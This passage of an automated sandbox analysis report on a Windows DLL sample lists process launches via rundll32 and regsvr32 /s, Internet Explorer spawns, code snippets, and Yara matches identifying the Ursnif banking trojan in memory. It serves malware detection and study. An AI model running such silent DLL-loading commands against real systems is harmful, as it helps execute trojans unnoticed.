            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C756A2 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C756A2
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll'
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\MGrYFpGLQ7.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Bighearted
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Soaking
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Turnipy
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82952 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17414 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82954 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Watertight
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Dithery
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anhimae
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82976 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anostraca
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17438 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Anaerobian
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83004 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Sparsile
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllUnregisterServer
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17452 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83036 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17470 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\MGrYFpGLQ7.dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,BigheartedJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,SoakingJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,TurnipyJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,WatertightJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DitheryJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,AnhimaeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,AnostracaJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllRegisterServerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,AnaerobianJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,SparsileJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,DllUnregisterServerJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82952 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17414 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82954 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82976 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17438 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83004 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17452 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:83036 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17470 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{97212EC2-1265-11EC-90E5-ECF4BB570DC9}.datJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFCC71BE5E716F720A.TMPJump to behavior
            Source: classification engineClassification label: mal88.troj.evad.winDLL@51/187@14/6
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: MGrYFpGLQ7.dllStatic PE information: real checksum: 0x247b4 should be: 0x24148
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F21C3 push ecx; ret 0_2_005F21D3
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F2170 push ecx; ret 0_2_005F2179
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C7B0CB push ecx; ret 0_2_00C7B0DB
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C7AD10 push ecx; ret 0_2_00C7AD19
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2009C push dword ptr [ebp-000000D8h]; ret 0_2_00C20252
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2009C push dword ptr [ebp-000000E0h]; ret 0_2_00C2029C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2009C push dword ptr [esp+10h]; ret 0_2_00C203AB
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C203AC push dword ptr [esp+0Ch]; ret 0_2_00C203BF
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C203AC push dword ptr [esp+10h]; ret 0_2_00C20404
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C20066 push dword ptr [ebp-000000D8h]; ret 0_2_00C2009B
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C20005 push dword ptr [ebp-000000D8h]; ret 0_2_00C20065
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_004021C3 push ecx; ret 2_2_004021D3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00402170 push ecx; ret 2_2_00402179
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005121C3 push ecx; ret 3_2_005121D3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00512170 push ecx; ret 3_2_00512179
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0408B0CB push ecx; ret 3_2_0408B0DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0408AD10 push ecx; ret 3_2_0408AD19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D0066 push dword ptr [ebp-000000D8h]; ret 3_2_005D009B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D0005 push dword ptr [ebp-000000D8h]; ret 3_2_005D0065
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D009C push dword ptr [ebp-000000D8h]; ret 3_2_005D0252
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D009C push dword ptr [ebp-000000E0h]; ret 3_2_005D029C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D009C push dword ptr [esp+10h]; ret 3_2_005D03AB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D03AC push dword ptr [esp+0Ch]; ret 3_2_005D03BF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D03AC push dword ptr [esp+10h]; ret 3_2_005D0404
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047BB0CB push ecx; ret 6_2_047BB0DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047BD341 pushfd ; retf 6_2_047BD342
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047BAD10 push ecx; ret 6_2_047BAD19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BFB0CB push ecx; ret 9_2_04BFB0DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BFAD10 push ecx; ret 9_2_04BFAD19
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C0B0CB push ecx; ret 12_2_04C0B0DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C0AD10 push ecx; ret 12_2_04C0AD19
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\MGrYFpGLQ7.dll

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000015.00000003.355232631.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355592572.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314475815.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367003924.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391468389.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370680495.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311090164.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313451317.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370551662.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391668872.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314245766.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391696489.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391496685.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355040596.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314318653.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311152381.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391727857.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311865061.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311345831.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391695930.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.311422020.0000000006CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.370336241.0000000006AE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311203958.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.313929901.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311769510.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311540194.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314268795.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355268021.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.361195316.00000000074A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391358945.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370621844.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311670564.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313872965.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391766298.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311984449.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.312268208.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314181933.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391634804.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313395188.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366812647.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355464241.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366846077.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370930604.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.528368895.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.525372552.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311633818.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.328237107.0000000005588000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.526965041.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366987894.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370755681.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.346412042.0000000006C48000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370579660.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314563024.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355144752.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366907200.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391423871.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.354973566.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313701626.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391783104.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391671709.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366961006.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311364814.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.366875687.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.313576458.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311042721.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391794887.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370911517.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.391520743.0000000003138000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.311282599.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.355518422.0000000007528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000003.310694636.00000000070D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.391596036.0000000007088000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.314078107.0000000004C88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.314146839.0000000006878000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.311573394.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.370793730.0000000004D98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.527384744.0000000005538000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.367026517.00000000072A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2880, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3556, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5040, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6536, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7000, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1496, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
